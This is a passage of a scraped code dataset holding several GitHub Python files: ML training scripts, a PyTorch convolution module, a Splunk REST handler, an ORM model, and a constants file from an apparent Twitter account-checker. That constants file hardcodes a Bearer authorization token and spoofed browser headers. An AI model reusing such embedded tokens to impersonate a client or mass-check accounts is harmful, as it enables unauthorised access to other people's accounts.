"django_elasticsearch_dsl.documents.model_field_class_to_field_class", "line_number": 12, "usage_type": "name"}, {"api_name": "swp.models.fields.LongURLField", "line_number": 12, "usage_type": "name"}, {"api_name": "django.db.models.URLField", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 12, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.fields.ObjectField", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django_elasticsearch_dsl.fields", "line_number": 54, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.fields.TextField", "line_number": 58, "usage_type": "call"}, {"api_name": "django_elasticsearch_dsl.fields", "line_number": 58, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.fields.TextField", "line_number": 62, "usage_type": "call"}, {"api_name": "django_elasticsearch_dsl.fields", "line_number": 62, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.fields.ObjectField", "line_number": 68, "usage_type": "attribute"}, {"api_name": "django_elasticsearch_dsl.fields", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 86, "usage_type": "name"}, {"api_name": "django.contrib.postgres.fields.ArrayField", "line_number": 93, "usage_type": "argument"}, {"api_name": "django_elasticsearch_dsl.Document.to_field", "line_number": 94, "usage_type": "call"}, {"api_name": "django_elasticsearch_dsl.Document", "line_number": 94, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.fields.ListField", "line_number": 96, "usage_type": "call"}, {"api_name": "django_elasticsearch_dsl.fields", "line_number": 96, "usage_type": "name"}, {"api_name": "django_elasticsearch_dsl.Document.to_field", "line_number": 98, "usage_type": "call"}, {"api_name": "django_elasticsearch_dsl.Document", "line_number": 98, "usage_type": "name"}]}
+{"seq_id": "30725958167", "text": "''' import numpy as np\nimport pandas\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Input\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.utils import np_utils\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.pipeline import Pipeline\n\ndf = pandas.read_json('json_data.json')\n# replace nan with -1000\ndf.fillna(0, inplace=True)\ndataset = df.values\nX = dataset[:, df.columns != 'location'].astype(float)\n# multiple all values by -1\nX[:, :] = X[:, :] * -1/100\nY = dataset[:, df.columns == 'location']\n\nencoder = LabelEncoder()\nencoder.fit(Y)\nencoded_Y = encoder.transform(Y)\n# convert integers to dummy variables (i.e. one hot encoded)\ndummy_y = np_utils.to_categorical(encoded_Y)\nprint(dummy_y)\n\nprint(X)\n\n# define baseline model\n\n\ndef create_model():\n # create model\n model = Sequential()\n model.add(Input(shape=np.shape(X[0]), name='input'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(2, activation='softmax'))\n # Compile model\n model.compile(loss='categorical_crossentropy',\n optimizer='rmsprop', metrics=['accuracy'])\n return model\n\n\nmodel = create_model()\nhistory_callback = model.fit(X, dummy_y, epochs=100, batch_size=50)\nscore = model.evaluate(X, dummy_y, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\ny_pred = model.predict(X)\nactual = np.argmax(dummy_y, axis=1)\npredicted = np.argmax(y_pred, axis=1)\nprint(actual)\nprint(predicted)\n# save the model to disk\nmodel.save('model.h5')\n '''\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport tensorflow as tf\n\ndf = pd.read_csv('data_file.csv')\ndf.fillna(0, inplace=True)\n\ndf['is_inside'] = [\n 1 if typ == 'inside' else 0 for typ in df['location']\n]\ndf.drop('location', axis=1, inplace=True)\n\nX = df.drop('is_inside', axis=1)\ny = df['is_inside']\n\nX_train, X_test, y_train, y_test = train_test_split(\n X, y,\n test_size=0.2, random_state=42\n)\n\nscaler = StandardScaler()\nX_train_scaled = scaler.fit_transform(X_train)\nX_test_scaled = scaler.transform(X_test)\n\n\ntf.random.set_seed(42)\n\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(256, activation='relu'),\n tf.keras.layers.Dense(256, activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\n\nmodel.compile(\n loss=tf.keras.losses.binary_crossentropy,\n optimizer=tf.keras.optimizers.Adam(lr=0.03),\n metrics=[\n tf.keras.metrics.BinaryAccuracy(name='accuracy'),\n tf.keras.metrics.Precision(name='precision'),\n tf.keras.metrics.Recall(name='recall')\n ]\n)\n\nhistory = model.fit(X_train_scaled, y_train, epochs=100)\n\npredictions = model.predict(X_test_scaled)\n\nprediction_classes = [\n 1 if prob > 0.5 else 0 for prob in np.ravel(predictions)\n]\n\nprint(prediction_classes)\n\nmodel.save('model.h5')\n", "repo_name": "helloparthshah/ecs172Labs", "sub_path": "Lab6/python server/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 3107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 78, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.random.set_seed", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 100, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.BinaryAccuracy", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.Precision", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.Recall", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.ravel", "line_number": 113, "usage_type": "call"}]}
+{"seq_id": "8121484503", "text": "import functools\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport itertools\nfrom functools import reduce\n\nimport torch.nn.functional as F\nimport math\nfrom math import cos,atan\n\n#CCD相机参数\nCCD_length = 7.7\nCCD_width = 5.5\nox = CCD_width/2\noy = CCD_length/2\na = 8.3\nk = 4\ndx = 0.00859375\ndy = 0.00859375\nf = 8\n\nclass dis_conv(nn.Module):\n def __init__(self, w, h, batch_size):\n super(dis_conv,self).__init__()\n w0, h0 = w, h\n batch_size0 = batch_size\n self.bn = np.zeros((h0,w0))\n for i in range(h0):\n for j in range(w0):\n a0 = atan(dx*(j-ox)/f)\n self.bn[i,j] = math.floor((cos(a0)-1)*(i-oy))\n \n self.conv1 = nn.Conv2d(3, 3, kernel_size=3, stride=1, padding=0,\n bias=False)\n \n def forward(self,input):\n input = input.cuda()\n shape1 = input.shape\n #print(shape1)\n \n feature1 = torch.zeros((shape1[0],shape1[1],shape1[2],(shape1[3])))\n \n \n matrix1 = torch.zeros((shape1[0],shape1[1],3,3)).cuda()\n \n tb = torch.zeros((9),dtype=torch.int)\n for i in range(shape1[2]):\n for j in range(shape1[3]):\n if i+2= 256:\n j1 = j%256\n tb[k] = int(i+int(k/3)+self.bn[int(i+k/3),int(j1+k%3)])\n else:\n tb[k] = int(i+int(k/3)+self.bn[int(i+k/3),int(j+k%3)])\n \n matrix1[:,:,int(k/3),int(k%3)] = input[:,:,tb[k],int(k%3)]\n \n \n feature1[:,:,i,j] = self.conv1(matrix1).reshape(shape1[0],shape1[1])\n \n out = feature1\n \n out = out.cuda()\n return out\n \n \n ", "repo_name": "hukexiangcun/DDCNet", "sub_path": "DDCNet_allV1/modeling/s2cnn/dis_convolutional.py", "file_name": "dis_convolutional.py", "file_ext": "py", "file_size_in_byte": 2077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 31, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 32, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.int", "line_number": 47, "usage_type": "attribute"}]}
+{"seq_id": "73586569048", "text": "\nimport import_declare_test\n\nfrom splunktaucclib.rest_handler.endpoint import (\n field,\n validator,\n RestModel,\n SingleModel,\n)\nfrom splunktaucclib.rest_handler import admin_external, util\nfrom splunktaucclib.rest_handler.admin_external import AdminExternalHandler\nimport logging\n\nutil.remove_http_proxy_env_vars()\n\n\nfields = [\n field.RestField(\n 'account_username',\n required=True,\n encrypted=False,\n default=None,\n validator=validator.String(\n max_len=50, \n min_len=1, \n )\n ), \n field.RestField(\n 'account_password',\n required=True,\n encrypted=True,\n default=None,\n validator=validator.String(\n max_len=8192, \n min_len=1, \n )\n )\n]\nmodel = RestModel(fields, name=None)\n\n\nendpoint = SingleModel(\n 'graphee_accounts',\n model,\n config_name='accounts'\n)\n\n\nif __name__ == '__main__':\n logging.getLogger().addHandler(logging.NullHandler())\n admin_external.handle(\n endpoint,\n handler=AdminExternalHandler,\n )\n", "repo_name": "Bamfax/graphee", "sub_path": "graphee/bin/graphee_rh_accounts.py", "file_name": "graphee_rh_accounts.py", "file_ext": "py", "file_size_in_byte": 1088, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "splunktaucclib.rest_handler.util.remove_http_proxy_env_vars", "line_number": 14, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.util", "line_number": 14, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.endpoint.field.RestField", "line_number": 18, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.endpoint.field", "line_number": 18, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.endpoint.validator.String", "line_number": 23, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.endpoint.validator", "line_number": 23, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.endpoint.field.RestField", "line_number": 28, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.endpoint.field", "line_number": 28, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.endpoint.validator.String", "line_number": 33, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.endpoint.validator", "line_number": 33, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.endpoint.RestModel", "line_number": 39, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.endpoint.SingleModel", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.NullHandler", "line_number": 50, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.admin_external.handle", "line_number": 51, "usage_type": "call"}, {"api_name": "splunktaucclib.rest_handler.admin_external", "line_number": 51, "usage_type": "name"}, {"api_name": "splunktaucclib.rest_handler.admin_external.AdminExternalHandler", "line_number": 53, "usage_type": "name"}]}
+{"seq_id": "38663618070", "text": "import json\nVERSION = \"5.0\"\nPROFILE_HEADERS = {\n 'authority': 'twitter.com',\n 'accept': '*/*',\n 'accept-language': 'en-US,en;q=0.9',\n 'authorization': 'Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA',\n 'origin': 'https://twitter.com',\n 'referer': 'https://twitter.com/settings/profile',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'sec-gpc': '1',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',\n 'x-twitter-active-user': 'yes',\n 'x-twitter-auth-type': 'OAuth2Session',\n 'x-twitter-client-language': 'en'\n}\n\nwith open(\"config.json\", \"r\") as f:\n config = json.load(f)\n\nPROXY_URL = config.get(\"proxy\")\nNUM_THREADS = config.get(\"threads\")\nCT0_FIX = config.get(\"ct0_fix\")\nMAX_RETRIES = 10\n\nif PROXY_URL:\n PROXY = f\"http://{PROXY_URL}\"\nelse:\n PROXY = None\n", "repo_name": "FatBeeBHW/Twitter-Account-Checker", "sub_path": "util/const.py", "file_name": "const.py", "file_ext": "py", "file_size_in_byte": 994, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.load", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "70728461848", "text": "from infrastructure.dataset_repository import DatasetRepository\nfrom domain.dataset_factory import DatasetFactory\nfrom domain.service import PreprocessingOptions, PreprocessingService\nfrom infrastructure.metadata import MetadataRepository\nfrom pydantic import BaseModel\nfrom typing import List, Dict\nfrom domain.service import Metadata\n\nclass PreprocessingFitTransformArgs(BaseModel):\n input_dir_path: str\n output_dir_path: str\n fulfillment_mode: str\n columns_to_fulfill: List[str]\n\nclass PreprocessingFitTransformFacade:\n def __init__(self,\n dataset_repository: DatasetRepository,\n preprocessing_service: PreprocessingService,\n metadata_repository: MetadataRepository,\n ):\n self._dataset_repository = dataset_repository\n self._preprocessing_service = preprocessing_service\n self._metadata_repository = metadata_repository\n\n def fit_transform(self, args: PreprocessingFitTransformArgs):\n dataset_factory = DatasetFactory(self._dataset_repository)\n dataset = dataset_factory.create_from_files(\n input_dir_path=args.input_dir_path)\n\n preprocessing_options = PreprocessingOptions(fulfillment_mode=args.fulfillment_mode,\n columns_to_fulfill=args.columns_to_fulfill,\n )\n\n metadata = self._preprocessing_service.preprocess(dataset=dataset,\n preprocessing_options=preprocessing_options,\n )\n self._dataset_repository.save_dataset(\n dataset, output_dir_path=args.output_dir_path)\n\n self._metadata_repository.save_metadata(\n metadata=metadata.to_dict(), run_name=args.run_name)\n\nclass PreprocessingTransformFacade:\n def __init__(self,\n metadata_repository: MetadataRepository,\n preprocessing_service: PreprocessingService,\n dataset_repository: DatasetRepository,\n ):\n self._metadata_repository = metadata_repository\n self._preprocessing_service = preprocessing_service\n self._dataset_repository = dataset_repository\n\n def transform(self,\n measurements: List[Dict],\n run_name: str):\n\n measurements_series = DatasetFactory.create_from_dict(measurements)\n\n metadata = Metadata.from_dict(self._metadata_repository.get_metadata(\n run_name=run_name))\n\n preprocessing_options = PreprocessingOptions(fulfillment_mode=metadata.filler_metadata['filler_type'], \n columns_to_fulfill=list(metadata.filler_metadata[\n 'filler_value'].keys()),\n )\n\n self._preprocessing_service.preprocess(dataset=measurements_series,\n preprocessing_options=preprocessing_options,\n metadata_do=metadata,\n ) ", "repo_name": "swiatowiec/Forecast", "sub_path": "preprocessing/domain/facade.py", "file_name": "facade.py", "file_ext": "py", "file_size_in_byte": 3176, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pydantic.BaseModel", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "infrastructure.dataset_repository.DatasetRepository", "line_number": 17, "usage_type": "name"}, {"api_name": "domain.service.PreprocessingService", "line_number": 18, "usage_type": "name"}, {"api_name": "infrastructure.metadata.MetadataRepository", "line_number": 19, "usage_type": "name"}, {"api_name": "domain.dataset_factory.DatasetFactory", "line_number": 26, "usage_type": "call"}, {"api_name": "domain.service.PreprocessingOptions", "line_number": 30, "usage_type": "call"}, {"api_name": "infrastructure.metadata.MetadataRepository", "line_number": 45, "usage_type": "name"}, {"api_name": "domain.service.PreprocessingService", "line_number": 46, "usage_type": "name"}, {"api_name": "infrastructure.dataset_repository.DatasetRepository", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "name"}, {"api_name": "domain.dataset_factory.DatasetFactory.create_from_dict", "line_number": 57, "usage_type": "call"}, {"api_name": "domain.dataset_factory.DatasetFactory", "line_number": 57, "usage_type": "name"}, {"api_name": "domain.service.Metadata.from_dict", "line_number": 59, "usage_type": "call"}, {"api_name": "domain.service.Metadata", "line_number": 59, "usage_type": "name"}, {"api_name": "domain.service.PreprocessingOptions", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "26367644375", "text": "# !/usr/bin/env python\n# -*- coding: utf8 -*-\n\nfrom sqlalchemy import Column, BIGINT, BOOLEAN, VARCHAR, ForeignKey\nfrom sqlalchemy.orm import relationship\n\nfrom .base import MyMixin, Base, BaseOrm\n\nfrom utils.orm_format import model_to_list, session_auto_commit\n\n\nclass UserModel(MyMixin, Base):\n __tablename__ = \"user\"\n\n id = Column(BIGINT, primary_key=True, autoincrement=True)\n email = Column(VARCHAR(255), unique=True)\n mobileNumber = Column(VARCHAR(16))\n isActive = Column(BOOLEAN)\n isAdmin = Column(BOOLEAN)\n password = Column(VARCHAR(255))\n username = Column(VARCHAR(255), unique=True)\n receiveNoticeEmail = Column(BOOLEAN)\n passwordRecoveryCode = Column(VARCHAR(255))\n orderCount = Column(BIGINT)\n city_id = Column(BIGINT, ForeignKey(\"city.id\"))\n successOrderCount = Column(BIGINT)\n realName = Column(VARCHAR(255))\n removed = Column(BOOLEAN)\n orders = relationship(\"OrderModel\", back_populates=\"user\")\n addresses = relationship(\"AddressesModel\", back_populates=\"user\")\n oauth2_session = relationship(\"Oauth2SessionModel\", back_populates=\"user\")\n\n\nclass UserOrm(BaseOrm):\n def __init__(self, db):\n super().__init__(db)\n\n @model_to_list\n def get_all_users(self):\n return self.session.query(UserModel).order_by(UserModel.id).all()\n\n def get_all_mobile_number(self):\n return self.session.query(UserModel.mobileNumber).all()\n\n @session_auto_commit\n def add_users(self, param):\n new_user = UserModel(**param)\n self.session.add(new_user)\n\n @session_auto_commit\n def del_users(self, param):\n del_user = self.session.query(UserModel).filter_by(**param).first()\n self.session.delete(del_user)\n\n @model_to_list\n def search_users(self, param):\n users = self.session.query(UserModel).filter_by(**param).first()\n return users\n\n @session_auto_commit\n def update_users(self, query_param, update_param):\n self.session.query(UserModel).filter_by(**query_param).update(update_param)\n", "repo_name": "Zacard274/library", "sub_path": "orm/user.py", "file_name": "user.py", "file_ext": "py", "file_size_in_byte": 2032, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "base.MyMixin", "line_number": 12, "usage_type": "name"}, {"api_name": "base.Base", "line_number": 12, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.BIGINT", "line_number": 15, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.BOOLEAN", "line_number": 18, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.BOOLEAN", "line_number": 19, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.BOOLEAN", "line_number": 22, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.BIGINT", "line_number": 24, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.BIGINT", "line_number": 25, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.BIGINT", "line_number": 26, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.BOOLEAN", "line_number": 28, "usage_type": "argument"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 31, "usage_type": "call"}, {"api_name": "base.BaseOrm", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.orm_format.model_to_list", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.orm_format.session_auto_commit", "line_number": 45, "usage_type": "name"}, {"api_name": "utils.orm_format.session_auto_commit", "line_number": 50, "usage_type": "name"}, {"api_name": "utils.orm_format.model_to_list", "line_number": 55, "usage_type": "name"}, {"api_name": "utils.orm_format.session_auto_commit", "line_number": 60, "usage_type": "name"}]}
+{"seq_id": "30851048547", "text": "from __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport time\n\nimport numpy as np\nimport scipy.sparse as sp\nimport torch\nfrom torch import optim\nimport warnings\nimport os\nimport json\nfrom model import GCNModelVAE\nfrom optimizer import loss_function\nfrom utils import load_data, mask_test_edges, preprocess_graph, get_roc_score, show_graph_with_labels\nfrom torch.utils.tensorboard import SummaryWriter\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport networkx as nx\nfrom torch import nn\nimport manifolds\nimport json\nfrom synthetic import SyntheticDataset\n\nfrom geoopt.manifolds.poincare.math import dist\n\ndef get_freer_gpu():\n os.system('nvidia-smi -q -d Memory |grep -A4 GPU|grep Free >tmp')\n memory_available = [int(x.split()[2]) for x in open('tmp', 'r').readlines()]\n return 'cuda:'+str(np.argmax(memory_available))\n\n\ndevice = torch.cuda.is_available()\nparser = argparse.ArgumentParser()\nparser.add_argument('--model', type=str, default='gcn_vae', help=\"models used\")\nparser.add_argument('--seed', type=int, default=123456789, help='Random seed.')\nparser.add_argument('--epochs', type=int, default=400, help='Number of epochs to train.')\nparser.add_argument('--hidden1', type=int, default=32, help='Number of units in hidden layer 1.')\nparser.add_argument('--hidden2', type=int, default=2, help='Number of units in hidden layer 2.')\nparser.add_argument('--gamma', type=float, default=1, help='coefficient for the information term')\nparser.add_argument('--lr', type=float, default=0.0005, help='Initial learning rate.')\nparser.add_argument('--dropout', type=float, default=0., help='Dropout rate (1 - keep probability).')\nparser.add_argument('--dataset-str', type=str, default='synthetic', help='type of dataset.')\nparser.add_argument('--device', type=str, default=get_freer_gpu() if device else 'cpu')\nparser.add_argument('--noise_dim', type=int, default=1)\nparser.add_argument('--K', type=int, default=18)\nparser.add_argument('--J', type=int, default=3)\nparser.add_argument('--c', type=float, default=1., help='constant of curvature')\nparser.add_argument('--warmup_de', type=float, default=30.)\nparser.add_argument('--final_latent', type=str, default=True)\nparser.add_argument('--start_latent_display', type=int, default=0)\nparser.add_argument('--reduced_latent_size', type=int, default=1000)\nparser.add_argument('--latent_display_show', type=int, default=50)\nparser.add_argument('--latent_animation', type=str, default=False)\nparser.add_argument('--syn_dim', type=list, default=[64, 64])\nparser.add_argument('--syn_depth', type=int, default=6)\nparser.add_argument('--new_generation', type=bool, default=True)\nargs = parser.parse_args()\n\nwarnings.filterwarnings('ignore')\n\n\nclass ExpZero(nn.Module):\n def __init__(self, manifold):\n super(ExpZero, self).__init__()\n self.manifold = manifold\n\n def forward(self, input):\n return self.manifold.expmap0(input)\n\n\nclass LogZero(nn.Module):\n def __init__(self, manifold):\n super(LogZero, self).__init__()\n self.manifold = manifold\n\n def forward(self, input):\n return self.manifold.logmap0(input)\n\nclass Discriminator(nn.Module):\n def __init__(self, feature_dim=2, z_dim=2):\n super(Discriminator, self).__init__()\n self.z_dim = z_dim\n self.feature_dim = feature_dim\n self.net = nn.Sequential(\n nn.Linear(self.z_dim + self.feature_dim, 1000),\n nn.ReLU(False),\n nn.Linear(1000, 400),\n nn.ReLU(False),\n nn.Linear(400, 100),\n nn.ReLU(False),\n nn.Linear(100, 1),\n\n )\n\n def forward(self, x, z):\n x = x.view(-1, 64*64)\n x = torch.cat((x, z), 1)\n return self.net(x).squeeze()\n\n\ndef permute_dims(z):\n assert z.dim() == 2\n B, _ = z.size()\n perm = torch.randperm(B).to(args.device)\n perm_z = z[perm]\n return perm_z\n\ndef gae_for(args):\n torch.manual_seed(args.seed + 1)\n print(\"Using {} dataset\".format(args.dataset_str))\n if args.dataset_str in ['cora', 'citeseer', 'pubmed']:\n adj, features, labels = load_data(args.dataset_str)\n print(adj.shape, features.shape)\n exit()\n\n elif args.dataset_str == 'synthetic':\n if args.new_generation:\n dict_adj, adj_array, features = SyntheticDataset(args.syn_dim, args.syn_depth).__getitem__()\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(dict_adj))\n features = (255 - features) / 255.\n features = torch.Tensor(features)\n else:\n with open('adj_dict.json', 'r') as fp:\n dict_adj = json.load(fp)\n\n adj_dict = {}\n for a in dict_adj:\n adj_dict[int(a)] = dict_adj[a]\n\n adj_array, features = np.load('adjacancy.npy'), np.load('features.npy')\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(adj_dict))\n features = torch.Tensor(features)\n else:\n raise ValueError('not exist!!!')\n\n features = features.to(args.device).unsqueeze(1)\n n_nodes, _, feat_dim_hight, feat_dim_length = features.shape\n\n # Store original adjacency matrix (without diagonal entries) for later\n adj_orig = adj\n adj_orig = adj_orig - sp.dia_matrix((adj_orig.diagonal()[np.newaxis, :], [0]), shape=adj_orig.shape)\n adj_orig.eliminate_zeros()\n\n adj_train, train_edges, val_edges, val_edges_false, test_edges, test_edges_false = mask_test_edges(adj=adj,\n args=args)\n adj = adj_train\n\n # Some preprocessing\n adj_norm = preprocess_graph(adj)\n adj_norm = adj_norm.to(args.device)\n\n adj_label = adj_train + sp.eye(adj_train.shape[0])\n # adj_label = sparse_to_tuple(adj_label)\n adj_label = torch.FloatTensor(adj_label.toarray())\n adj_orig_tile = adj_label.unsqueeze(2).repeat(1, 1, args.K)\n adj_orig_tile = adj_orig_tile.to(args.device)\n\n pos_weight = torch.tensor(float(adj.shape[0] * adj.shape[0] - adj.sum()) / adj.sum()).float().to(\n device=args.device)\n norm = adj.shape[0] * adj.shape[0] / float((adj.shape[0] * adj.shape[0] - adj.sum()) * 2)\n\n psi_input_dim = args.noise_dim + feat_dim_hight + feat_dim_length\n logv_input_dim = feat_dim_hight + feat_dim_length\n\n model = GCNModelVAE(psi_input_dim, logv_input_dim, args.hidden1, args.hidden2, args.dropout, args.K, args.J, args.noise_dim, args.device, args.c).to(args.device)\n optimizer = optim.Adam(model.parameters(), lr=args.lr)\n\n D = Discriminator(feature_dim=64*64, z_dim=args.hidden2).to(args.device)\n optimizer_D = optim.Adam(D.parameters(), lr=0.0005)\n manifold = getattr(manifolds, 'PoincareBall')(args.hidden2, args.c)\n\n latent_img = []\n fig = plt.figure()\n ax = fig.add_subplot(111)\n mapper = LogZero(manifold)\n\n for epoch in range(args.epochs):\n warm_up = torch.min(torch.FloatTensor([epoch/args.warmup_de, 1])).to(args.device)\n\n t = time.time()\n model.train()\n\n reconstruct_iw, log_prior_iw, log_H_iw, psi_iw_vec, psi_iw = model(features, adj_norm)\n hidden_emb = psi_iw[:, 1, :].data.contiguous().cpu().numpy()\n z_vec = mapper(psi_iw)\n\n loss1 = loss_function(reconstructed_iw=reconstruct_iw, log_prior_iw=log_prior_iw, log_H_iw=log_H_iw,\n adj_orig_tile=adj_orig_tile, nodes=n_nodes, K=args.K, pos_weight=pos_weight, 